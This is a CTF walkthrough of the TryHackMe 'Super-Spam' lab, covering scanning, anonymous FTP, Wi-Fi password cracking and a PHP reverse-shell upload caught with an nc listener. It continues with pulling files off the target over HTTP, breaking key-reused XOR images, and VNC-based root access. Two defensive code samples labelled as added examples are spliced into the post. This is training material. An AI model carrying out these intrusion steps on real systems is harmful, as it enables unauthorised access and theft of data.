TryHackMe Super-Spam walkthrough

S_K
13 min read · May 29, 2022


About the Super-spam CTF
General Uvilix:

Good Morning! Our intel tells us that he has returned. Super-spam, the evil alien villain from the planet Alpha Solaris IV from the outer reaches of the Andromeda Galaxy. He is a most wanted notorious cosmos hacker who has made it his lifetime mission to attack every Linux server possible on his journey to a Linux-free galaxy. As an avid Windows proponent, Super-spam has now arrived on Earth and has managed to hack into OUR Linux machine in pursuit of his ultimate goal. We must regain control of our server before it’s too late! Find a way to hack back in to discover his next evil plan for total Windows domination! Beware, super-spam’s evil powers are to confuse and deter his victims.

Super-Spam Recon

Nmap output

nmap -sCV -T4 10.10.111.160
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-27 10:03 IST
Nmap scan report for 10.10.111.160
Host is up (0.29s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http?
5901/tcp open vnc VNC (protocol 3.8)
| vnc-info:
| Protocol version: 3.8
| Security types:
| VNC Authentication (2)
| Tight (16)
| Tight auth subtypes:
|_ STDV VNCAUTH_ (2)
6001/tcp open X11 (access denied)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 281.62 seconds

All-port scan

nmap -sCV -T4 -p- 10.10.14.182
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-27 10:54 IST
Nmap scan report for 10.10.14.182
Host is up (0.26s latency).
Not shown: 65530 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
4012/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 86:60:04:c0:a5:36:46:67:f5:c7:24:0f:df:d0:03:14 (RSA)
| 256 ce:d2:f6:ab:69:7f:aa:31:f5:49:70:e5:8f:62:b0:b7 (ECDSA)
|_ 256 73:a0:a1:97:c4:33:fb:f4:4a:5c:77:f6:ac:95:76:ac (ED25519)
4019/tcp open ftp vsftpd 3.0.3
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.8.85.106
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 1
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| drwxr-xr-x 2 ftp ftp 4096 Feb 20 2021 IDS_logs
|_-rw-r--r-- 1 ftp ftp 526 Feb 20 2021 note.txt
5901/tcp open vnc VNC (protocol 3.8)
| vnc-info:
| Protocol version: 3.8
| Security types:
| VNC Authentication (2)
| Tight (16)
| Tight auth subtypes:
|_ STDV VNCAUTH_ (2)
6001/tcp open X11 (access denied)
Service Info: OSs: Linux, Unix; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1493.73 seconds
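As an added example (not part of the original walkthrough), here is a small Python parser for the nmap normal-output port table shown above, run over a trimmed copy of that scan, together with a defender-side exposure review that flags what this scan surfaces: anonymous FTP, a VNC service reachable from the network, and an X11 listener. The sample text, the function names and the remediation wording are this example's own, not nmap's.

```python
import re

# Constructed sample: a trimmed copy of the all-port scan shown on the page.
SAMPLE_SCAN = """\
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
4012/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
4019/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| drwxr-xr-x 2 ftp ftp 4096 Feb 20 2021 IDS_logs
|_-rw-r--r-- 1 ftp ftp 526 Feb 20 2021 note.txt
5901/tcp open vnc VNC (protocol 3.8)
| vnc-info:
| Protocol version: 3.8
6001/tcp open X11 (access denied)
"""

# One row of the port table: "<port>/<proto> <state> <service> [<version>]"
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")


def parse_nmap_ports(text):
    """Parse nmap's normal-output port table into a list of dicts.

    NSE script lines (those starting with '|' or '|_') are attached to the
    port row that precedes them, with the leading '|', '_' and spaces removed.
    """
    ports = []
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            port, proto, state, service, version = m.groups()
            ports.append({
                "port": int(port),
                "proto": proto,
                "state": state,
                "service": service,
                "version": version or "",
                "scripts": [],
            })
        elif line.startswith("|") and ports:
            ports[-1]["scripts"].append(line.lstrip("|_ ").strip())
    return ports


def review_exposure(ports):
    """Return (port, finding) pairs for exposures a defender would act on.

    The checks mirror what the scan on this page reveals; they are this
    example's own heuristics, not an nmap feature.
    """
    findings = []
    for p in ports:
        if p["state"] != "open":
            continue
        svc = p["service"].lower()
        script_text = " ".join(p["scripts"]).lower()
        if svc == "ftp" and "anonymous ftp login allowed" in script_text:
            findings.append((p["port"],
                             "anonymous FTP login allowed: directory contents "
                             "are readable without credentials"))
        if svc == "vnc":
            findings.append((p["port"],
                             "VNC reachable from the network: bind it to "
                             "127.0.0.1 and reach it over an SSH tunnel"))
        if svc == "x11":
            findings.append((p["port"],
                             "X11 listening on the network: start the X server "
                             "with -nolisten tcp"))
    return findings


if __name__ == "__main__":
    for port, finding in review_exposure(parse_nmap_ports(SAMPLE_SCAN)):
        print(f"{port}/tcp: {finding}")
```

The parser keys on the `port/proto` column rather than on fixed widths, so it also copes with the first scan's `80/tcp open http?` row, where nmap could not identify the service.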

FTP (port 4019)
List all files:

ftp 10.10.14.182 4019
Connected to 10.10.14.182.
220 (vsFTPd 3.0.3)
Name (10.10.14.182:root): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -a
229 Entering Extended Passive Mode (|||45021|)
150 Here comes the directory listing.
drwxr-xr-x 4 ftp ftp 4096 May 30 2021 .
drwxr-xr-x 4 ftp ftp 4096 May 30 2021 ..
drwxr-xr-x 2 ftp ftp 4096 May 30 2021 .cap
drwxr-xr-x 2 ftp ftp 4096 Feb 20 2021 IDS_logs
-rw-r--r-- 1 ftp ftp 526 Feb 20 2021 note.txt
226 Directory send OK.
ftp>

The listing shows a hidden .cap directory, the IDS_logs directory and a note.txt file.

note.txt
ftp> more note.txt
12th January: Note to self. Our IDS seems to be experiencing high volumes of unusual activity.
We need to contact our security consultants as soon as possible. I fear something bad is going
to happen. -adam

13th January: We’ve included the wireshark files to log all of the unusual activity. It keeps
occuring during midnight. I am not sure why.. This is very odd… -adam

15th January: I could swear I created a new blog just yesterday. For some reason it is gone… -adam

24th January: Of course it is… — super-spam :)
ftp>

IDS_logs directory files:

-rw-r--r-- 1 ftp ftp 14132 Feb 20 2021 12-01-21.req.pcapng
-rw-r--r-- 1 ftp ftp 0 Feb 20 2021 13-01-21-spammed.s
-rw-r--r-- 1 ftp ftp 0 Feb 20 2021 13-01-21-spammed010.s
-rw-r--r-- 1 ftp ftp 0 Feb 20 2021 13-01-21-spammed013.s
-rw-r--r-- 1 ftp ftp 0 Feb 20 2021 13-01-21-spammed01h3.s
-rw-r--r-- 1 ftp ftp 0 Feb 20 2021 13-01-21-spammed01ha.s
-rw-r--r-- 1 ftp ftp 0 Feb 20 2021 13-01-21-spammed50n0.c
-rw-r--r-- 1 ftp ftp 0 Feb 20 2021 13-01-21-spammed50n0.t
-rw-r--r-- 1 ftp ftp 0 Feb 20 2021 13-01-21-spammed6.s
-rw-r--r-- 1 ftp ftp 0 Feb 20 2021 13-01-21-spammed806.s
-rw-r--r-- 1 ftp ftp 0 Feb 20 2021 13-01-21-spammed810.s
-rw-r--r-- 1 ftp ftp 0 Feb 20 2021 13-01-21-spammed816.s
-rw-r--r-- 1 ftp ftp 0 Feb 20 2021 13-01-21-spammed86.s
-rw-r--r-- 1 ftp ftp 0 Feb 20 2021 13-01-21-spammeda1ha.s
-rw-r--r-- 1 ftp ftp 0 Feb 20 2021 13-01-21-spammedabha.s
-rw-r--r-- 1 ftp ftp 74172 Feb 20 2021 13-01-21.pcap
-rw-r--r-- 1 ftp ftp 0 Feb 20 2021 14-01-21-spammed22n0.s
...
...
-rw-r--r-- 1 ftp ftp 0 Feb 20 2021 spammed9.s

• Download the file inside the .cap directory (SamsNetwork.cap)

Network analysis

Based on the packets, this looks like captured Wi-Fi traffic (a "Wi-Fi hacking" capture), so I'll be using aircrack-ng to brute-force it.

  • Brute-force the Wi-Fi password
    This confirms that the file contains a Wi-Fi handshake. We can crack the Wi-Fi password with aircrack-ng, or convert the file to hashcat's format and crack the WPA2 password there.
    command: aircrack-ng SamsNetwork.cap -w /usr/share/wordlists/rockyou.txt

• No use for it so far.

HTTP (port 80)

Web page:

• There is a /blog directory; let's find all the users there.

  • Usernames:
    ◇ benjamin_blogger
    ◇ adam_admin
    ◇ donald_dump
    ◇ lucy_Loser

• Now we have 4 possible usernames and 1 password; let's check our golden password reuse policy (password reuse is not a good idea!).

Brute-force

◇ Turns out brute-forcing is a bad idea: there is a CSRF token, and I'm lazy. Anyway, there are only 4 usernames and 1 password to combine, so I can do it manually!

◇ And it worked!!

  • Click the Files button

Allow File Type Change

  • Click the File button and finally an upload option; I'll be using a PHP reverse shell to get into the box.

Uploading the backdoor

  • Drag and drop the file and close

• Start a listener

• curl/access the PHP file on the web server and get the shell
Command: curl http://10.10.216.44/concrete5/application/files/3116/5372/1953/php-reverse-shell.php

nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.8.85.106] from (UNKNOWN) [10.10.216.44] 46692
Linux super-spam 4.15.0-140-generic #144-Ubuntu SMP Fri Mar 19 14:12:35 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
07:17:44 up 15 min, 1 user, load average: 0.02, 0.53, 0.78
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root pts/0 :1 07:04 13:28 0.00s 0.00s sh
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$

• TTY shell upgrade
python3 -c "import pty;pty.spawn('/bin/bash')"

• home directory
www-data@super-spam:/$ ls -la /home
ls -la /home
total 28
drwxr-xr-x 7 root root 4096 Feb 20 2021 .
drwxr-xr-x 22 root root 4096 Apr 9 2021 ..
drwxr-xr-x 2 benjamin_blogger benjamin_blogger 4096 Apr 9 2021 benjamin_blogger
drw-rw---- 6 donalddump donalddump 4096 Apr 9 2021 donalddump
drwxr-xr-x 7 lucy_loser lucy_loser 4096 Apr 9 2021 lucy_loser
drwxr-xr-x 5 root root 4096 May 30 2021 personal
drwxr-xr-x 4 super-spam super-spam 4096 Apr 9 2021 super-spam
www-data@super-spam:/$

• Got the User Flag
www-data@super-spam:/home/personal/Work$ cat flag.txt
flag{-eteKc=skineogyls45«ey?t+du8}

We are in! We locate a directory that contains a xored.py file, a note, and ten .png files. It looks like they used an XOR-based encryption function to embed a secret message in the picture files. Let's download these for more analysis:

www-data@super-spam:/home/lucy_loser/.MessagesBackupToGalactic$ ls -la
ls -la
total 1720
drwxr-xr-x 2 lucy_loser lucy_loser 4096 May 30 2021 .
drwxr-xr-x 7 lucy_loser lucy_loser 4096 Apr 9 2021 ..
-rw-r--r-- 1 lucy_loser lucy_loser 172320 Apr 8 2021 c1.png
-rw-r--r-- 1 lucy_loser lucy_loser 171897 Apr 8 2021 c10.png
-rw-r--r-- 1 lucy_loser lucy_loser 168665 Apr 8 2021 c2.png
-rw-r--r-- 1 lucy_loser lucy_loser 171897 Apr 8 2021 c3.png
-rw-r--r-- 1 lucy_loser lucy_loser 171462 Apr 8 2021 c4.png
-rw-r--r-- 1 lucy_loser lucy_loser 167772 Apr 8 2021 c5.png
-rw-r--r-- 1 lucy_loser lucy_loser 167772 Apr 8 2021 c6.png
-rw-r--r-- 1 lucy_loser lucy_loser 171462 Apr 8 2021 c7.png
-rw-r--r-- 1 lucy_loser lucy_loser 171734 Apr 8 2021 c8.png
-rw-r--r-- 1 lucy_loser lucy_loser 173994 Apr 8 2021 c9.png
-rw-r--r-- 1 lucy_loser lucy_loser 20987 Apr 8 2021 d.png
-rw-r--r-- 1 lucy_loser lucy_loser 497 May 30 2021 note.txt
-rw-r--r-- 1 lucy_loser lucy_loser 1200 Apr 8 2021 xored.py
www-data@super-spam:/home/lucy_loser/.MessagesBackupToGalactic$ cat note.txt
cat note.txt

Note to self. General super spam mentioned that I should not make the same mistake again of re-using the same key for the XOR encryption of our messages to Alpha Solaris IV’s headquarters, otherwise we could have some serious issues if our encrypted messages are compromised. I must keep reminding myself,do not re-use keys,I have done it 8 times already!.The most important messages we sent to the HQ were the first and eighth message.I hope they arrived safely.They are crucial to our end goal.
www-data@super-spam:/home/lucy_loser/.MessagesBackupToGalactic$

We can pull everything with the wget -r command. The -r flag (recursive) downloads every file in a directory from the remote target, and it pairs well with a python3 -m http.server started on the target in the directory you want to download.

• On the victim machine, serve the directory
www-data@super-spam:/home/lucy_loser/.MessagesBackupToGalactic$ python3 -m http.server
<r/.MessagesBackupToGalactic$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

• On our machine, download all the files
wget -r http://10.10.216.44:8000

Once all files are downloaded to our box, we open the .png files. In one of them you can make out a message containing a password. This password turns out to be the SSH login password of the user donalddump; we determine this by trying each of our four blog usernames with it over SSH:

• We also got a xored.py script; let's use it to decrypt the message.

• It requires two PNG files. After a lot of trying, I found that c2.png and c8.png worked.

• Command: python3 xored.py
[!] Note Add extention also.
[-] Enter First Image: c2.png
[-] Enter Second Image: c8.png
[-] Enter Name of The output image:out.png
[+] Reading pic1
[+] Reading pic2
<PIL.PngImagePlugin.PngImageFile image mode=RGB size=440x227 at 0x7F3C51576A30>
[+] Xored successfully
[+] Successfully saved as out.png

  • Open the output .png image
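The note above warns against re-using the XOR key, and xored.py works precisely because that warning was ignored. The following Python is an added example, not the room's xored.py or any code from the walkthrough: it operates on bytes rather than PNG pixels, but the arithmetic is the same. The messages and keys are constructed stand-ins. It shows why XORing two ciphertexts made under one key cancels the key and leaves m1 XOR m8, why knowing one message then yields the other, and why a fresh key per message closes the hole.

```python
# Added example: the effect of re-using an XOR key across two messages.
# Not the room's xored.py; messages and keys below are constructed stand-ins.

def xor_bytes(a: bytes, b: bytes) -> bytes:
    """XOR two equal-length byte strings."""
    if len(a) != len(b):
        raise ValueError("inputs must have equal length")
    return bytes(x ^ y for x, y in zip(a, b))


def xor_encrypt(message: bytes, key: bytes) -> bytes:
    """XOR 'encryption'. This is only secure when the key is random, at least
    as long as the message, and never used for a second message."""
    if len(key) < len(message):
        raise ValueError("key must be at least as long as the message")
    return xor_bytes(message, key[:len(message)])


def combine_ciphertexts(c_a: bytes, c_b: bytes) -> bytes:
    """XOR two ciphertexts. If both were produced with the same key k, then
    (m_a ^ k) ^ (m_b ^ k) == m_a ^ m_b: the key cancels out entirely."""
    return xor_bytes(c_a, c_b)


def recover_other_message(c_a: bytes, c_b: bytes, known_m_a: bytes) -> bytes:
    """Once the key has cancelled, knowing one plaintext gives the other."""
    return xor_bytes(combine_ciphertexts(c_a, c_b), known_m_a)


# Constructed sample messages, padded to a common length (hypothetical text).
MSG_LEN = 64
FIRST_MESSAGE = b"Message 1: server compromised, awaiting orders from HQ.".ljust(MSG_LEN)
EIGHTH_MESSAGE = b"Message 8: next target is the blog host, strike at dawn.".ljust(MSG_LEN)

# Deterministic stand-ins for keys; a real key would come from os.urandom().
REUSED_KEY = bytes((i * 37 + 11) & 0xFF for i in range(MSG_LEN))
FRESH_KEY = bytes((i * 53 + 7) & 0xFF for i in range(MSG_LEN))


def demo_key_reuse() -> dict:
    """Contrast one key used twice against a fresh key per message."""
    c1 = xor_encrypt(FIRST_MESSAGE, REUSED_KEY)
    c8_reused = xor_encrypt(EIGHTH_MESSAGE, REUSED_KEY)
    c8_fresh = xor_encrypt(EIGHTH_MESSAGE, FRESH_KEY)

    leak = combine_ciphertexts(c1, c8_reused)
    return {
        # True: XOR of the two ciphertexts equals XOR of the two plaintexts,
        # which is why XORing two images "decrypted" the picture in the room.
        "key_cancels": leak == xor_bytes(FIRST_MESSAGE, EIGHTH_MESSAGE),
        # With the first message known, the eighth falls out exactly.
        "recovered_eighth": recover_other_message(c1, c8_reused, FIRST_MESSAGE),
        # With a fresh key the same combination yields (m1 ^ m8) ^ (k1 ^ k8),
        # still masked by unknown key material, so the check is False.
        "fresh_key_leaks": combine_ciphertexts(c1, c8_fresh)
        == xor_bytes(FIRST_MESSAGE, EIGHTH_MESSAGE),
    }


if __name__ == "__main__":
    result = demo_key_reuse()
    print("key cancels out under reuse:", result["key_cancels"])
    print("recovered eighth message:", result["recovered_eighth"].decode().rstrip())
    print("same trick works with a fresh key:", result["fresh_key_leaks"])
```

The mitigation is the one the note states: never use a key for a second message. In practice that means a fresh random key per message (a true one-time pad) or, far more usefully, a proper authenticated cipher whose nonce, not the key, changes per message.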

• Log in over SSH as the donalddump user

ssh donalddump@10.10.12.91 -p 4012
The authenticity of host '[10.10.12.91]:4012 ([10.10.12.91]:4012)' can't be established.
ED25519 key fingerprint is SHA256:n+Oq7PHkf5ldKeaXZjejkz2mr1P5P/sunBU2bCcHaiI.
This host key is known by the following other names/addresses:
~/.ssh/known_hosts:361: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[10.10.12.91]:4012' (ED25519) to the list of known hosts.
donalddump@10.10.12.91's password:
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-140-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management:
https://landscape.canonical.com
* Support:
https://ubuntu.com/advantage

System information as of Sun May 29 05:23:14 UTC 2022

System load: 0.39 Processes: 103
Usage of /: 26.7% of 19.56GB Users logged in: 1
Memory usage: 74% IP address for eth0: 10.10.12.91
Swap usage: 0%

* Super-optimized for small spaces - read how we shrank the memory
footprint of MicroK8s to make it the smallest full K8s around.

https://ubuntu.com/blog/microk8s-memory-optimisation

71 packages can be updated.
0 of these updates are security updates.
To see these additional updates run: apt list --upgradable

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

Could not chdir to home directory /home/donalddump: Permission denied
-bash: /home/donalddump/.bash_profile: Permission denied
donalddump@super-spam:/$ cd
-bash: cd: /home/donalddump: Permission denied
donalddump@super-spam:/$

• Permission denied. Let's change the permissions of the home directory: chmod 777 /home/donalddump

Privilege Escalation

Now we remember the VNC service we found in our nmap scan.
Let's try to gain root using that.
Grab the VNC passwd file from donalddump's home directory:

donalddump@super-spam:~$ ls -la
total 44
drwxrwxrwx 6 donalddump donalddump 4096 Apr 9 2021 .
drwxr-xr-x 7 root root 4096 Feb 20 2021 ..
lrwxrwxrwx 1 root root 9 Apr 9 2021 .bash_history -> /dev/null
-rw-r--r-- 1 donalddump donalddump 220 Feb 20 2021 .bash_logout
-rw-r--r-- 1 donalddump donalddump 3771 Feb 20 2021 .bashrc
drwx------ 2 donalddump donalddump 4096 Apr 8 2021 .cache
drwx------ 3 donalddump donalddump 4096 Apr 8 2021 .gnupg
drwxr-xr-x 2 root root 4096 Feb 24 2021 morning
drwxr-xr-x 2 root root 4096 Feb 24 2021 notes
-rw-r--r-- 1 root root 8 Apr 8 2021 passwd
-rw-r--r-- 1 donalddump donalddump 807 Feb 20 2021 .profile
-rw-rw-r-- 1 donalddump donalddump 36 Apr 9 2021 user.txt
donalddump@super-spam:~$

Transfer it using python3 -m http.server on the target.
On your machine: wget ip:8000/passwd

Set up SSH local port forwarding to the VNC port, since we know donalddump's password:

ssh -L 5901:127.0.0.1:5901 donalddump@10.10.12.91 -p 4012
donalddump@10.10.12.91's password:
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-140-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management:
https://landscape.canonical.com
* Support:
https://ubuntu.com/advantage

System information as of Sun May 29 05:33:42 UTC 2022

System load: 0.0 Processes: 104
Usage of /: 26.7% of 19.56GB Users logged in: 2
Memory usage: 74% IP address for eth0: 10.10.12.91
Swap usage: 0%
71 packages can be updated.
0 of these updates are security updates.
To see these additional updates run: apt list --upgradable

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Sun May 29 05:23:34 2022 from 10.8.85.106
donalddump@super-spam:~$

Note: make sure you have a VNC viewer installed; if not, install it with: sudo apt install tigervnc-viewer
Run vncviewer -passwd passwd_file ip::5901 on your machine.
• passwd_file is the file we transferred from the Super-spam box to our machine; it was in the donalddump home directory.

The VNC session runs as root (note the # prompt below), so let's change the root password there and then log in as root from ssh:
passwd

# passwd
Enter new UNIX password:
Retype new UNIX password:
passwd: password updated successfully

Log in as the root user

donalddump@super-spam:~$ su -
Password:
root@super-spam:~# cd ~
root@super-spam:~# ls -la
total 76
drwx------ 8 root root 20480 May 29 05:18 .
drwxr-xr-x 22 root root 4096 Apr 9 2021 ..
lrwxrwxrwx 1 root root 9 Apr 9 2021 .bash_history -> /dev/null
-rw-r--r-- 1 root root 3106 Apr 9 2018 .bashrc
drwx------ 2 root root 4096 Feb 19 2021 .cache
drwx------ 3 root root 4096 Feb 19 2021 .gnupg
drwxr-xr-x 3 root root 4096 Feb 19 2021 .local
-rw------- 1 root root 969 May 29 2021 .mysql_history
drwxr-xr-x 2 root root 4096 Feb 24 2021 .nothing
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw-r--r-- 1 root root 66 Apr 8 2021 .selected_editor
drwx------ 2 root root 4096 Feb 19 2021 .ssh
-rw------- 1 root root 0 May 29 2021 .viminfo
drwx------ 2 root root 4096 May 29 05:18 .vnc
-rw-r--r-- 1 root root 208 Apr 9 2021 .wget-hsts
-rw------- 1 root root 642 May 29 05:18 .Xauthority
-rw------- 1 root root 1368 Apr 8 2021 .xsession-errors
root@super-spam:~#cd .nothing/
root@super-spam:~/.nothing# ls
r00t.txt
root@super-spam:~/.nothing# cat r00t.txt

what am i?: MZWGCZ33NF2GKZKLMRRHKPJ5NBVEWNWCU5MXKVLVG4WTMTS7PU======

KRUGS4ZANFZSA3TPOQQG65TFOIQSAWLPOUQG2YLZEBUGC5TFEBZWC5TFMQQHS33VOIQGEZLMN53GKZBAOBWGC3TFOQQHI2DJOMQHI2LNMUWCASDBMNVWK4RNNVQW4LBAMJ2XIICJEB3WS3DMEBRGKIDCMFRWWIDXNF2GQIDBEBRGSZ3HMVZCYIDNN5ZGKIDEMFZXIYLSMRWHSIDQNRQW4IDUN4QGOZLUEBZGSZBAN5TCA5DIMF2CA2LOMZSXE2LPOIQG64DFOJQXI2LOM4QHG6LTORSW2LBAJRUW45LYFYQA====
root@super-spam:~/.nothing#

The first string is base32-encoded: MZWGCZ33NF2GKZKLMRRHKPJ5NBVEWNWCU5MXKVLVG4WTMTS7PU======

Root Flag
flag{iteeKdbu==hjK6§YuUu7-6N_}
